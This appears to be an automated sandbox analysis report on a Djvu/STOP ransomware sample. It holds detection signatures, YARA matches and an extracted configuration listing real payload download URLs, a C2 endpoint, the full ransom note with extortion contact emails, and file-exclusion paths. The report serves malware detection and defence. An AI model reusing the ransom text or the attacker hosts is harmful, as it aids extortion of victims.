Edit tour

Windows Analysis Report
bP5g4FsSJk.exe

Overview

General Information

Sample Name:	bP5g4FsSJk.exe
Analysis ID:	679166
MD5:	28fb096cbce32cf1f87719254452014f
SHA1:	50ceaddc379e1376a579e4c9d4465fd3c734c277
SHA256:	1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98
Tags:	exeStop
Infos:

Detection

Djvu

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Djvu Ransomware

Antivirus detection for URL or domain

Machine Learning detection for sample

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

PE file contains strange resources

Contains functionality to read the PEB

Contains functionality to launch a program with higher privileges

Found evaded block containing many API calls

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

bP5g4FsSJk.exe (PID: 5468 cmdline: "C:\Users\user\Desktop\bP5g4FsSJk.exe" MD5: 28FB096CBCE32CF1F87719254452014F)

bP5g4FsSJk.exe (PID: 5604 cmdline: "C:\Users\user\Desktop\bP5g4FsSJk.exe" MD5: 28FB096CBCE32CF1F87719254452014F)

cleanup

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwX6oUNb4mk19lyNBxK80\\\\nWDzdQgJ9XMg2LdYk3Hm0F0zP2rWDuKVpyAbosbOzGKbJOkVa\\/1XbytFAm8RYfkB\\/\\\\nnfEgGh5OGcw\\/CcqqOL3R4Vpd7slLVXc56FLkTWEMSShzg1sNxgIiQm8VcaXOgUk8\\\\ntvWKcUIV9ujXmn5UBSy\\/ICDPveI3QCaxZod7kIBwZzszO\\/3CvNwAy3eejgJ6j8ie\\\\nmwJ9pjskzLjmq92yhDGUQygWfGw0tL1KtSiqUy2M7KNdmD4FX1aVeutZC9bggvn8\\\\nV4ksJChvMxI521ms58donyKjwBAbKXBfVRaXUV2k34bI0NQqhLz5OeGIRhn67oe+\\\\njwIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000000.271002067.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.278389009.0000000004235000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Process Memory Space: bP5g4FsSJk.exe PID: 5468	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: bP5g4FsSJk.exe PID: 5468	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x40823:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: bP5g4FsSJk.exe PID: 5604	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: bP5g4FsSJk.exe PID: 5604	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3120a:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0x698d4:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0x9ce37:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.bP5g4FsSJk.exe.400000.2.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.3.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.5.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.6.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.6.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.6.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.6.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.2.bP5g4FsSJk.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
1.2.bP5g4FsSJk.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.2.bP5g4FsSJk.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.2.bP5g4FsSJk.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.10.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.10.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.10.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.10.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
